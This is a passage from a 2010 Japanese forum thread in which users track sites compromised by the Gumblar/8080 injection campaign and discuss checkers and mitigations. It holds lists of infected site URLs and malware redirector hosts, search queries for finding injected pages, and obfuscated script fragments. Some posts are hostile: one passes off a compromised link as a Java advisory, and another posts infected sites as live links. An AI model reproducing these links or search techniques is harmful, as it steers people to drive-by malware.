センセイ激怒中w

>>633
なんでもかんでもクリッコするやつは
パソコンを使わない方がいいと思うw

635 :名無しさん@お腹いっぱい。:2010/04/07(水) 17:58:48
ABP 1.1.3ですけど

|http://*:8080*

でおk?


636 :名無しさん@お腹いっぱい。:2010/04/07(水) 20:26:56
>>650
ttp://www.aguse.jp/?m=w&url=www.footsal-club.net&x=30&y=19
ttp://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.unique-gifts-ideas.com%2Fcontact_us.html&x=39&y=16

阿斗ちゃん増殖中…

http://rd.or.tp/get.php?site=ayaka.echoll.net&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none
ここ出てたかな

637 :名無しさん@お腹いっぱい。:2010/04/07(水) 20:35:09
ごめんミス
>>625でした・・・


638 :コテハン ◆8080adndqg :2010/04/08(木) 04:45:37
新コードに絶賛更新中
【陥落サイトのURL悪用厳禁】
fleur●webinfo●jp → loadtube●ru:
dog-g-club●com → helphomecare●at:
f39●aaa●livedoor●jp/~miyui/archives/cat3/cat10/index●html → helphomecare●at:
miyagi●007champagne●biz/asobo → youhelpnow●ru:
dxenglish●value-net●net/index●html → bestdarkstar●info:
--
発掘中にみつけた8080じゃないやつ
www●bestofunder●com/ ←アクセス注意

639 :名無しさん@お腹いっぱい。:2010/04/08(木) 20:11:40
8080ではなく懐かしのGumblar.xちゃん
moebox●com/main●html

たぶんもっと前から改ざんされてたとおもうけど一応貼っとく
Last-Modified: Sun, 04 Apr 2010 23:20:30 GMT

640 :名無しさん@お腹いっぱい。:2010/04/08(木) 20:15:26
でもドメインが新しいのかこれ
.irってイランか
初めて見たわ

641 :名無しさん@お腹いっぱい。:2010/04/08(木) 20:20:54
>>639追記
aguseのソースをまとめてDLしてくれるの便利だね
/js/table.js や /js/lk.js にてんこ盛りされてて吹いた

642 :名無しさん@お腹いっぱい。:2010/04/08(木) 20:24:58
ずっと修正されないまま更新され続けてるっぽいなあ
同じURLが連続してるとこから手動ではなく自動っぽいことが伺える
まあLast-Modified: も近い時間になってるしね

643 :名無しさん@お腹いっぱい。:2010/04/09(金) 00:29:25
>>638
注意のURLを踏んでしまったOTZ
とあるインドの”コンピューターの危険にさらされる”サイトに飛ばされた

ちょうしこいて踏むんじゃなかったぉ・・・

644 :名無しさん@お腹いっぱい。:2010/04/09(金) 00:43:16
www●bestofunder●com/
↓2ヶ所に飛ばされる
zeneey●com/email/znystyle.phpとzeneey●com/は踏んでしまったOTZ
nt01●co●in/3 はセクルチーが防いで踏まずに済んだみたい…

zeneey●com/は感染サイトだから、今月中にOSの再インストールするぉ!





645 :名無しさん@お腹いっぱい。:2010/04/09(金) 15:42:26
>>622
> <!--562ba23ffcf28efa4f71fc787258d3d3-->
> <!--e62178df1fa90a28d1b2efa8443ab220-->
> 謎の文字列が謎...

この文字列が有る無しでもセキュリティベンダーによっては検出しない場合があるね。
つか、avast!対応早杉、頑張り過ぎだろw

646 :名無しさん@お腹いっぱい。:2010/04/09(金) 16:56:34
http://www.virustotal.com/jp/analisis/073b35436e7d1826fffeddb9ba86dbbda88b31ff0f313434cc192ab448b0598b-1270798114
http://www.virustotal.com/jp/analisis/576625dfc92ddec9c083a0be35955bcbbb2ccc00e8fa10529593b1d9fd66fa45-1270798218
http://www.virustotal.com/jp/analisis/64e5f4361d53c04a3507ccd0f5fa26f825334712f067cb1ca13a0752d5004cf6-1270798308
http://www.virustotal.com/jp/analisis/196b6cc52572a0df14fa9464d23791ae672ff96a7d193d232e4391d290b6a030-1270798380
http://www.virustotal.com/jp/analisis/bf1442e8539eff69b8cc1030558336386fe37ced27486f4781d1ac13cfb99606-1270798440
http://www.virustotal.com/jp/analisis/a8b209ae2b1c3763d0a2c594f707dc508e37321bd243b9e6651c541ca97d84c1-1270798557
http://www.virustotal.com/jp/analisis/c8cdcb6c4c477d5003838dfebc02a83c5988514cc043069d8358b5b5dee17dbc-1270798655
http://www.virustotal.com/jp/analisis/5a293d97eb69fc9b774679863c8702048de6d6f3b5fc701ae81b3309181fde3b-1270798725
http://www.virustotal.com/jp/analisis/aef4d81b737da5ed04e1baf7055584392e6e5bb9cbcda7003feb6463199e5c32-1270798795
http://www.virustotal.com/jp/analisis/ea69840abf9a2e9d0614bfae8968951493ad27439900fb4d4742422d069d5abb-1270798870
http://www.virustotal.com/jp/analisis/f972bd8e899ff3faf7d96441af889eb3382705badca99ebe6b96b2405b5102b7-1270799054
http://www.virustotal.com/jp/analisis/2368c9df63ed57807419bc6bd8549a8a4c8d5d7da87a0e823f30a7406da595df-1270799145
http://www.virustotal.com/jp/analisis/7688fcc5d7ff528a345f2fed476550887b3d979791431436a861b585c5ed91c9-1270799251
http://www.virustotal.com/jp/analisis/a5dce97142a62462733d934cb253aea387371ce9356f7b6a14ac135b72ca7ce8-1270799355

きゅ〜い!きゅ〜い!(キリッ

647 :コテハン ◆8080adndqg :2010/04/09(金) 18:05:56
【陥落サイトのURL悪用厳禁】
www●ferahdondurma●com ← アクセス注意!
※改竄されすぎててよくわからんw

neta-script●lionking●jp/ (.at:8080/)
8080系のスクリプトが最大の仕込み?


携帯オンリーで掘るのは厳しいゾ・・・とw


648 :名無しさん@お腹いっぱい。:2010/04/09(金) 18:28:30
ところでなんでVTのスキャンに使われているカスペってバージョン古いんだ?
VTのスキャン結果でカスペがスルーして「ウイルス検出できない!カスペオワタ!」
って言われるのはカスペ信者としては見過ごせないのだが。

649 :名無しさん@お腹いっぱい。:2010/04/09(金) 19:58:33
面倒くさいからじゃないか?w

650 :名無しさん@お腹いっぱい。:2010/04/09(金) 20:26:57
>>647
だれうまw

www●e-tokunaga●co●jp/contents/house_dock/index●html
www●vericapandilovska●com●mk/
this●is/ausgot/
at:8080

capvex●com
egujarat●net
info:8080

reagold●com
カスペに蹴られた…ウイルスか?

651 :コテハン ◆8080adndqg :2010/04/09(金) 20:43:45
>>650
>reagold●com
色々仕込んであるというか・・・元のページの面影が無いw

・<!-- ad -->
・Gumblarっぽいやつ
・var I={j・・・
・var Il1I1111I1=function

652 :名無しさん@お腹いっぱい。:2010/04/09(金) 20:57:46
www●e-tokunaga●co●jp/pc/free06●html

653 :名無しさん@お腹いっぱい。:2010/04/09(金) 21:20:17
動画って見るのめんどいよなあ
LACCOTV: 「Gumblarの脅威!新たな危険挙動を追跡中!」
http://www.youtube.com/user/laccotv#p/u/0/R1t4QPIRzsg

654 :名無しさん@お腹いっぱい。:2010/04/10(土) 02:13:31
>>621
> bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?

JREのアップデート通知でしょ。
Java 新版登場。27 種類の欠陥が修正されている。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/04.html#20100401_Oracle


655 :名無しさん@お腹いっぱい。:2010/04/10(土) 02:24:41
Javaの実行プログラムが呼ばれてタスクトレイにでてきたんじゃないの

656 :名無しさん@お腹いっぱい。:2010/04/10(土) 05:48:47
すみません教えてください
見たいサイトがあってグーグルのキャッシュというところをおして見ようとしたら
avastに警告され、キャッシュのURLを入れてチェッカーに掛けたら
外部へリダイレクトされていますと赤字で出ましたが
マルウェアが検出されないと出ます。
これってウイルスサイトではないってことですか?

657 :名無しさん@お腹いっぱい。:2010/04/10(土) 05:50:03
見たかったサイトはur-chintai.infoというところです。

658 :名無しさん@お腹いっぱい。:2010/04/10(土) 07:44:59
>>657
仮想マシン一台作って見にいってみたけど
403エラーで何も見れません。
心配なら、OSの再インストールを勧めます。


659 :名無しさん@お腹いっぱい。:2010/04/10(土) 07:46:34
ur-chintai.infoは以前ガンブラーに感染してたんだよ
今はアクセスできない
キャッシュは感染してる

660 :名無しさん@お腹いっぱい。:2010/04/10(土) 09:35:40
すいません、ガンブラーって手動削除可能でしょうか?
なんかウィルスバスター起動しなくて、、、

661 :名無しさん@お腹いっぱい。:2010/04/10(土) 10:14:53
www●geocities●jp/owari_ka_ra/
www●geocities●jp/o_tweb/
www●geocities●jp/shimilw/

662 :名無しさん@お腹いっぱい。:2010/04/10(土) 10:17:36
>www●geocities●jp/owari_ka_ra/
懐かしのCODE1

663 :名無しさん@お腹いっぱい。:2010/04/10(土) 10:18:27
>>658
>>659
ありがとうございました。感染してたur-chintai.●infoはなくなったのに
キャッシュで感染するんですね・・・
avastでHDD検査して一応ウイルスなかったのですが
カスペでもやって見つかったら再インストールします・・・


664 :名無しさん@お腹いっぱい。:2010/04/10(土) 10:19:48
>>663
avastが防いでくれたから問題ないだろ

665 :名無しさん@お腹いっぱい。:2010/04/10(土) 10:42:06
www●kyoudoumusen●jp

666 :名無しさん@お腹いっぱい。:2010/04/10(土) 11:00:03
freett●com/takarafune
www●tirashi●jp/ ここも全然対処しない

667 :名無しさん@お腹いっぱい。:2010/04/10(土) 11:11:09
ss-gaido●info

668 :名無しさん@お腹いっぱい。:2010/04/10(土) 11:12:02
ふりちけは存在自体がウイルス(広告的な意味で)

669 :名無しさん@お腹いっぱい。:2010/04/10(土) 12:22:19
avastスレより
partsdepot●jp/

670 :名無しさん@お腹いっぱい。:2010/04/10(土) 13:52:37
チキンな私のかわりにどなたかよろしく。。
www●gozaisho.co●jp

右下に「やんちゃ爆弾」てのが出ていて、難読化されています。
ググってみたら、やんちゃ爆弾自体はブログパーツのようなんですが、
ロープウェイの公式サイトにこんなオモチャを仕掛けるって、普通の企業なら
あり得ないと思うのですが。
そもそも、難読化する必要性がないですよね。他の部分は普通に読める
アドレスで貼ってあるのに、openの部分のみ。

既存のものを利用した新たな改竄ってことはないですか?
それともこれが普通の形態?

考えてみたら、ブログパーツ部分に仕掛けられたら、危険性認識せずに
押してしまう人はたくさんいそうだ。。

671 :名無しさん@お腹いっぱい。:2010/04/10(土) 14:16:56
>>670
解読結果

     *      *
  *  うそです   +  
     n ∧_∧ n
 + (ヨ(* ´∀`)E)
      Y     Y    *

wwwwww

672 :名無しさん@お腹いっぱい。:2010/04/10(土) 14:31:47
>>660
無理
セキュリティソフトが起動しない時点でいろいろやられてるってことです
OS入れなおしましょう

673 :名無しさん@お腹いっぱい。:2010/04/10(土) 14:35:08
>>663
キャッシュなら安全とおもうほうがおかしいよ
単純に考えてコードをそのまま保存するんだから攻撃スクリプトも保存されるでしょ

674 :名無しさん@お腹いっぱい。:2010/04/10(土) 15:05:31
1994年生まれの人集まれ!★3
http://gimpo.2ch.net/test/read.cgi/nendai/1269784099/

675 :名無しさん@お腹いっぱい。:2010/04/10(土) 15:41:51
>>674
マルチ死ね

676 :名無しさん@お腹いっぱい。:2010/04/10(土) 15:47:05
やっぱavast入れとくか

677 :名無しさん@お腹いっぱい。:2010/04/10(土) 16:28:00
何使おうがやるべき事やっていれれば今のところは感染のしようもないけどな。

678 :名無しさん@お腹いっぱい。:2010/04/10(土) 16:50:37
>>2の対策だけで心配なら以下の変更もやっておく可
Internet Explorer で ActiveX コントロールの動作を停止する方法
http://support.microsoft.com/kb/240797
Java Runtime Environment
http://this.is/ausgot/?id=forum/serious-new-java-flaw-affects-all-browsers-040910

679 :名無しさん@お腹いっぱい。:2010/04/10(土) 16:59:16
下のURLあやしすぎわろた

680 :650:2010/04/10(土) 17:09:46
>>678
俺の貼った陥落サイトのURL使ってんじゃねーよクソが
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fthis.is%2Fausgot%2F%3Fid%3Dforum%2Fserious-new-java-flaw-affects-all-browsers-040910+&x=55&y=13

681 :名無しさん@お腹いっぱい。:2010/04/10(土) 17:17:18
>>680
管理者氏名がパッと見Gumblarに見えたwww

682 :コテハン ◆8080adndqg :2010/04/10(土) 18:23:06
>>670
ここは鑑定スレではありませぬ。

>>678
下段のURLは8080系の陥落サイト。
easyfunguide●at:8080/

「陥落サイトが増える(かもしれない)」から
遊びで貼るのはやめましょう。


683 :名無しさん@お腹いっぱい。:2010/04/10(土) 23:49:47
http://www.avast.com/virus-monitor
JS:Illredir-AQ(=8080)の増え方が激しい…本日の検出数は上から5番目
盛大に拡散中ですなwww

684 :名無しさん@お腹いっぱい。:2010/04/11(日) 02:57:32
ここで話していいかわからんけどgredのURL入力欄で http:// ってのいらなくね?
消すのメンドイ

685 :コテハン ◆8080adndqg :2010/04/11(日) 03:39:09
【陥落サイトのURL悪用厳禁】
jyo●eisuku●com/home/
adgaw●com/lovesheet/index●html
www●borneomarathon●com/jpn/home●html ←旧型

けんさくわーど:"new String();" "new Date();" "new Array();" -JAVA -JAVAScript
site:jp の検索結果 約 160 件
site:cn の検索結果 約 490 件
site:ru の検索結果 約 1,860 件 ←www

686 :名無しさん@お腹いっぱい。:2010/04/11(日) 03:46:13
お前らなんでこんな詳細にウイルス分析してんだよww
セキュリティベンダーに就職しろwww

687 :名無しさん@お腹いっぱい。:2010/04/11(日) 06:22:17
www■tirashi■jp/
トップはメンテ中になってるが他のページがネット上に残ったまま
www■tirashi■jp/tmp/flyer_zooma/ZcyyxafVGp_129/

688 :名無しさん@お腹いっぱい。:2010/04/11(日) 07:05:13
www■niaufuku■com/sense_up/index■htm
書き込みに失敗しているところが掛ったと思ったら
www■niaufuku■com/index■htm
他のページは成功してるらしい。

bag■fukunekodo■com/mindex/ 携帯向けのサイト
と思ったらfukunekodo■com/ 上にあるサイトが全部やられてるっぽい

wagashi■fukunekodo■com/index/
shochu■fukunekodo■com/index/
nihonshu■fukunekodo■com/index/
sweet■fukunekodo■com/index/
cosme■fukunekodo■com/index/
make■fukunekodo■com/index/
car■fukunekodo■com/index/
mens■fukunekodo■com/index/
pc■fukunekodo■com/index/
baby■fukunekodo■com/index/
diet■fukunekodo■com/index/ たぶん他にもあると思う

失敗?
inner■fukunekodo■com/index/
fashion■fukunekodo■com/index/
acces■fukunekodo■com/index/
golf■fukunekodo■com/index/
meet■fukunekodo■com/index/
bekkan■fukunekodo■com/index/ 

どっちもru:8080

689 :名無しさん@お腹いっぱい。:2010/04/11(日) 09:10:08
>>665
ホームページ制作会社
Collco - 株式会社コルコ
ttp://www●collco●jp/works/index.html

ttp://www.virustotal.com/jp/analisis/5b775a22571016560950fe2bd81349e73163483a3e199beb7292c32612555b37-1270944263

世もまつだww

690 :名無しさん@お腹いっぱい。:2010/04/11(日) 09:13:54
コルコ倒産しろ

691 :名無しさん@お腹いっぱい。:2010/04/11(日) 10:18:20
>>689
世も末(すえ)な
日本語は正しく使いましょう

692 :名無しさん@お腹いっぱい。:2010/04/11(日) 10:29:28
マジにネタレスカッコイイ

693 :名無しさん@お腹いっぱい。:2010/04/11(日) 11:17:06
>>688 fukunekodo●com
絞り込んでみた
ttp://search●yahoo●co●jp/search?p=site%3Afukunekodo●com%2F+%22function%22&ei=UTF-8&fr=top_ga1_sa&x=wrt
検索結果 約193件(多少の巻き込み有)

>>689
www●collco●jp/
↓巻き込み改竄↓
www●kyoudoumusen●jp/

/(^o^)\やっちまった
・・・ということだなw

694 :名無しさん@お腹いっぱい。:2010/04/11(日) 11:33:44
>>693
fukunekodoひどいな

コルコはorz×100000000000

695 :650:2010/04/11(日) 11:52:00
利用されるくらいならやめちまえと書き込みを控えるつもりでいたが、
ちょっと気になったので賢明な諸兄の判断を仰ぎたく・・・

http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.aparajeyo.org%2Findex.php&x=53&y=7
> www●saidenterprise●com:2095/login/

ウイルスかな?
違ってたらすまない、本当に少し気になっただけなんだ

696 :名無しさん@お腹いっぱい。:2010/04/11(日) 12:24:52
>>695
www●aparajeyo●org/index●php
avastが反応、JS:Illredir-AL

絶賛崩壊中w
ソース見た限りでは.ru:8080だな
下のアドレスはどこから?

697 :696:2010/04/11(日) 12:27:40
と思ったら下にあったのかorz
Web Mailって書いてあるから、ポート2095はたぶん関係ないと思う

698 :650:2010/04/11(日) 12:38:41
>>696
すまない、ありがとう

699 :コテハン ◆8080adndqg :2010/04/11(日) 13:50:02
【陥落サイトのURL悪用厳禁】
www●nadara●jp ←途中で切れてる
npo-aichi●or●jp/ ← \(^o^)/
creole●jp/
kumarin●biz/


700 :696:2010/04/11(日) 14:19:24
npo-aichi
4発(本文3発.js1発)仕込みwww

しかし何で途中で切れたりするんだろ

701 :650:2010/04/11(日) 14:51:08
www●amakusaturigu●com
hrhr●sakura●ne●jp ←ブログ?

>>700
それはいつも思う、どうしてだろうね?

702 :名無しさん@お腹いっぱい。:2010/04/11(日) 14:57:58
650のままだった事と、>>636で未来の自分に安価打ってた事に
今頃気が付いたw

名無しさんに戻りますね

703 :名無しさん@お腹いっぱい。:2010/04/11(日) 16:57:31
加速度的に被害広がってるのに、話題的にはどんどん静まってきてるのはなんでだろう
現実逃避?

704 :名無しさん@お腹いっぱい。:2010/04/11(日) 16:58:08
ttp://headlines.yahoo.co.jp/hl?a=20100409-00000031-inet-secu

そういえば、cmsツールの脆弱性とか聞いた覚えがあったw

705 :名無しさん@お腹いっぱい。:2010/04/11(日) 18:06:18
iner●kz/index2●php

Googleにリダイレクト
77●221●153●178/go2/in●phpの代替かも…よく判らない


>>703
対策取っとけば怖くない現実に辿り着いたんだよきっとw

誰も感染しなくなって、ガンブラーが廃れて、このスレも要らなくなる
それが何より望ましい事なんだからそれはそれで良い結末だけどね

>>704
これ以降の話?
ttp://www.itmedia.co.jp/enterprise/articles/1004/08/news068.html

706 :名無しさん@お腹いっぱい。:2010/04/11(日) 18:40:42
>>705
前にHP作成会社に聞いた話で
複数のHPを管理していて改竄されたのが一つだけ
自動更新するソフトを使ってるHPだけが改竄されたとか
IPAと警察庁に報告する様お願いしたけど

んで、今日同じ様な話しを聞いて思い出したw

707 :名無しさん@お腹いっぱい。:2010/04/11(日) 21:17:09
>>703
対策や予防方法が広く認知されるようになったからだろう。
わかっていても検証コスト等の理由で後手に回っているサーバの改ざんは広がっていても
閲覧するだけの個人ユーザに被害が及ばなくなれば話題としては収束するさ。

708 :コテハン ◆8080adndqg :2010/04/11(日) 21:41:42
>>700
npo-aichiはサイト内全滅でござる
/content/include/xoops●js
/content/modules/xhld0/phpdate●js
/content/modules/xhld1/phpdate●js
/content/modules/xhld2/phpdate●js
/content/modules/xhld3/phpdate●js
jsも全滅w


709 :名無しさん@お腹いっぱい。:2010/04/11(日) 22:36:12
これはひどいwww

710 :名無しさん@お腹いっぱい。:2010/04/12(月) 00:44:35
報告アドレスが結構悪用されてるな
感染を広げる一因にもなってるんじゃねw

711 :名無しさん@お腹いっぱい。:2010/04/12(月) 00:45:38
報告アドレスを難読化させればよいんじゃね?

712 :名無しさん@お腹いっぱい。:2010/04/12(月) 01:40:06
>>711
おまい頭いいなwww

713 :名無しさん@お腹いっぱい。:2010/04/12(月) 01:58:58
> 報告アドレスを難読化

こんな感じかな?
http:%2F%2Fwww.jc-consulting.jp%2F
http:%2F%2Fwww.amakusaturigu.com%2Fhtml%2F
http:%2F%2Fwww.niaufuku.com%2Findex.htm

ちなみに踏んでも無害だから安心しる!

714 :名無しさん@お腹いっぱい。:2010/04/12(月) 02:14:06
>>713
こゆのはどないだ?(苦笑
687474703a2f2f7777772e6a632d636f6e73756c74696e672e6a702f
687474703a2f2f7777772e616d616b7573617475726967752e636f6d2f68746d6c2f0d0a
687474703a2f2f7777772e6e69617566756b752e636f6d2f696e6465782e68746d0d0a

715 :名無しさん@お腹いっぱい。:2010/04/12(月) 02:18:34
この程度でいいんじゃね?
aHR0cDovL3d3dy5leGFtcGxlLmNvbS8K
aHR0cDovL3d3dy4yY2gubmV0Lwo=
aHR0cDovL3BjMTEuMmNoLm5ldC90ZXN0L3JlYWQuY2dpL3NlYy8xMjY4MDU5Njg0Lwo=

716 :名無しさん@お腹いっぱい。:2010/04/12(月) 02:21:05
javaに0dayだってさ。



717 :名無しさん@お腹いっぱい。:2010/04/12(月) 02:26:45
>>714 へっくし案
>>715 はっぱ案


718 :コテハン ◆8080adndqg :2010/04/12(月) 12:46:01
d3d3LnNha2lrby5qcA==
こうすれば良いんだな?


719 :コテハン ◆8080adndqg :2010/04/12(月) 13:05:16
\x68\x74\x74\x70\x3a\x2f\x2f の時は捜しやすかったんだが・・・
発掘されやすいから %68%74%74%70%3a%2f%2f こうしたのかな?

ttp://search●yahoo●co●jp/search?p=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=

720 :名無しさん@お腹いっぱい。:2010/04/12(月) 15:15:31
aHR0cDovL3d3dy5hZ3VzZS5qcC8/bT13JnVybD1odHRwJTNBJTJGJTJGd3d3LmRhaW5pLXN1cnZleS5jb20lMkYmeD00NiZ5PTQ=
ここって1回閉鎖したんじゃなかった?

721 :名無しさん@お腹いっぱい。:2010/04/12(月) 15:26:51
www●bandoolshien●com

nodさんが反応しました

722 :名無しさん@お腹いっぱい。:2010/04/12(月) 15:30:56
難読化云々よりここに晒す前に凸ってればいいのでは?

723 :名無しさん@お腹いっぱい。:2010/04/12(月) 16:48:30
凸だけじゃどうせスルーされるか隠蔽されるだけだから公表すべきだけど
みんなに知らせるって意味じゃ難読化してちゃ意味ないんだよな

724 :名無しさん@お腹いっぱい。:2010/04/12(月) 17:34:40
まあ2chに貼られたURL無用心に踏む奴もなあ
俺は2chに貼ってあるURLは全てgredとaguseでチェックしてるけど

725 :名無しさん@お腹いっぱい。:2010/04/12(月) 18:14:28
そこらへんはひっかかるほうも悪いよな
グロでもウイルスでも2chじゃ無用心に踏む方も悪い
グロ踏んで学習するかウイルス踏んで学習するかの違いだろう
貼るバカを肯定するわけじゃないけどな

726 :名無しさん@お腹いっぱい。:2010/04/12(月) 18:52:36
張るバカよりも踏むバカのほうが悪いって感覚が蔓延してる限り悪用はなくならんよ
不特定多数の人間がいる場所では常に用心はすべきだというのは紛れもない事実だけどね

727 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:04:59
URL貼られることの多いスレとかはテンプレに 
※貼られたURLが安全だということは保障できません 踏む前に必ずブラクラチェック等行いましょう※
くらい入れてもいい気はする

728 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:08:28
ドライビングバイダウンロード攻撃突撃ィ!

729 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:14:53
どこへドライブ行くんだよ

730 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:19:30
不利な対策ソフトを使っている人は不幸だねぇ

731 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:21:38
ガンブラー系に限ってならDr.WEBが強いから心配な人は使ってみれば

Dr.WEB リンクチェッカー
http://drweb.jp/support/link_checker.html

732 :名無しさん@お腹いっぱい。:2010/04/12(月) 19:28:42
コマンドの例
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
Gumblar/8080 Checker=http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/$TEXT$LINK


733 :オルティス・ジャパン:2010/04/12(月) 22:02:43
www●collco●jp/
コルコの方、こっそり修正している様ですが
告知はまだですか?

先程は検討をしてると言っていましたね
未だに告知をしていない様ですが…

それとね、貴方達は修正したつもりなのでしょうけど
リダイレクターはまだ残っているのです
改竄は完全には修正されてはいないのです

他の方からメールで教えて貰った事を全て完全に実行しなさい
>>584を心に刻み、心を入れ替えなさい
真摯な姿勢こそが大切だとは思わないのですか

734 :名無しさん@お腹いっぱい。:2010/04/12(月) 22:22:17
>>733
せめて安価は>>606にw

> リダイレクター
確認すた。。。。

735 :名無しさん@お腹いっぱい。:2010/04/12(月) 22:59:27
情報処理推進機構:情報セキュリティ:ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html
> ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
> ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
> ・ 改ざんの事実の説明
> ・ 改ざんされていた箇所
> ・ 改ざんされていた期間
> ・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
> ・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
> ・ 問い合わせ用窓口の連絡先

736 :名無しさん@お腹いっぱい。:2010/04/13(火) 00:56:13
>>733
それについてはエヌピーオー愛知ネットも気になるね

昨日、NPO-AICHIの登録担当と技術担当、倉敷CATVの技術担当のメアドに
aguseの調査結果を送ってさしあげたら何の説明もなしに閉鎖してたさ

"災害時の確実な情報伝達を目的とするNPO法人"とか何のジョークだよw

737 :名無しさん@お腹いっぱい。:2010/04/13(火) 00:58:03
>>736
役に立たない鳩耳に密告しておくか・・・・

738 :名無しさん@お腹いっぱい。:2010/04/13(火) 01:07:55
>>736
イ牛のNPOからスクリプトは除去したってメルきたお。
その時点ではスクリプトはなくなってた。
IPAに被害報告してってことと>>735のこと書いて返信したら403になった。
思案中かも。

739 :名無しさん@お腹いっぱい。:2010/04/13(火) 01:13:03
>>738
おやそうでしたか、それは失礼しました…

740 :名無しさん@お腹いっぱい。:2010/04/13(火) 01:40:20
明日の朝までに緑になってますように (-人-)
ttp://www.google.com/url?q=http%3A%2F%2Fonline%2Eus%2Edrweb%2Ecom%2Fresult%2F%3Furl%3Dhttp%253A%252F%252Fwww%252Ecollco%252Ejp%252Finquiry%252Findex%252Ephp

741 :名無しさん@お腹いっぱい。:2010/04/13(火) 03:19:58
JAVA Web Startの0-day対策は

javaws.exeをHIPS等で無効化
Firefoxだったら、Java Deployment Toolkitプラグインを無効化

とかでいいのかな?
どうも情報が少なくてよくわからない。

742 :名無しさん@お腹いっぱい。:2010/04/13(火) 03:57:50
これか。

ttp://japan.cnet.com/news/sec/story/0,2000056024,20411906,00.htm
> Ormandy氏がこの脆弱性についてSun Microsystemsに連絡したと
>ころ、四半期ごとの通常の修正パッチ公開スケジュール外でパッチを
>公開するほど緊急度が高いとは考えていない、との返事だったという。

またしばらく放置される訳ですね、わかります。Sunはマジで死ね。

743 :名無しさん@お腹いっぱい。:2010/04/13(火) 04:05:32
>>736
倉敷CATVも感染してたのか・・・実家の地元局でケーブル引いてるだけになんか凄い残念だな

744 :名無しさん@お腹いっぱい。:2010/04/13(火) 04:06:28
>>740
指摘されないとわからないバカの集団らしいなw
/inquiry
<!--トロイを絶賛配布中!(無料)-->
↑追記しておけwwwww

745 :名無しさん@お腹いっぱい。:2010/04/13(火) 04:14:14
>>743
whoisかaguse見れ
魚青 211.125.125.234の管理

746 :741:2010/04/13(火) 04:22:51
>>742
とりあえずHIPSを使うまでもなく、NTFSのアクセス権設定でjavaws.exe(C:\Program Files\
Java\jre6\binとC:\WINDOWS\system32の二つある、よくわからないのでとりあえず両方)の
読み取りと実行を拒否した状態で、以下テストページでjavaws.exeが実行されないことを確認。
ttp://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

ただ、本当に情報が少なくてこれが緩和策になっているのかよくわからない。

747 :名無しさん@お腹いっぱい。:2010/04/13(火) 04:42:37
>>745
どゆことなの?出されたIPを調べたらnpo-aichi.or.jpって出たが
npo-aichiの登録・技術担当と倉敷CATVの技術担当が同じって事?

もしその通りって事だと倉敷CATVは今感染してなくとも危ないって事?

748 :名無しさん@お腹いっぱい。:2010/04/13(火) 05:23:51
>>746
Operaでプラグイン入れてないと読み込みが完了しないかんじ。

>>747
大家と店子の関係

749 :名無しさん@お腹いっぱい。:2010/04/13(火) 06:41:42
マスターペニス

750 :名無しさん@お腹いっぱい。:2010/04/13(火) 06:55:32
ドライビングバイ海老名SAダウンロード

751 :名無しさん@お腹いっぱい。:2010/04/13(火) 12:07:50
深刻な危険

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2211

752 :コテハン ◆8080adndqg :2010/04/13(火) 13:27:30
a2FkYXJ1Lm15ZG5zLnRvLw== ←再発
d3d3LmFtYWt1c2F0dXJpZ3UuY29tLw0K
----
6Zml6JC944K144Kk44OI44GuVVJM44KS6YGK44Gz44O744GE44Gf44Ga44KJ55uu55qE44Gn6LK84
4KL44GK44OQ44Kr44GV44KT44Gv44CB6ISz44G/44Gd44Gu44Kv44Oq44O844Oz44Kk44Oz44K544
OI44O844OrKOWGjeaVmeiCsinjgYzlv4XopoHjgaDjgajmgJ3jgo/jgozjgb7jgII=
・・・ということですw

753 :名無しさん@お腹いっぱい。:2010/04/13(火) 13:33:40
>>740
77y8KF5vXinvvI/jgqrjg6/jgr8=

754 :名無しさん@お腹いっぱい。:2010/04/13(火) 13:43:43
http://www.jc-consulting.jp/
http://www.footsal-club.net/
http://www.oracle-shop.net/
http://pacific-staff.net/
http://hoikuen.19th.org/
http://sunrise.2pg.in/
http://netnavi.boo.jp/leopalace/link/
http://www.toutyann.com/
http://ayaka.echoll.net/
http://dog-g-club.com/
http://www.bestofunder.com/
http://moebox.com/link.html
http://www.ferahdondurma.com/
http://www.e-tokunaga.co.jp/contents/house_dock/index.html
http://www.vericapandilovska.com.mk/
http://this.is/ausgot/
http://capvex.com/
http://egujarat.net/
http://jyo.eisuku.com/home/
http://www.borneomarathon.com/jpn/home.html
http://www.aparajeyo.org/index.php
http://www.niaufuku.com/index.htm
http://kumarin.biz/
http://www.amakusaturigu.com/html/
http://www.bandoolshien.com/
http://www.hdta.jp/

きゅ〜い!きゅ〜い!(キリッ

755 :名無しさん@お腹いっぱい。:2010/04/13(火) 13:56:15
ばーか

756 :名無しさん@お腹いっぱい。:2010/04/13(火) 13:57:18
確信犯死ねよ

757 :名無しさん@お腹いっぱい。:2010/04/13(火) 14:20:55
aHR0cDovL2Jvby4yY2gubmV0L2JvbzIwMDguY2dpP3R5cGU9cmVkJmJvbzIwMDhfdXJpPWh0dHAl
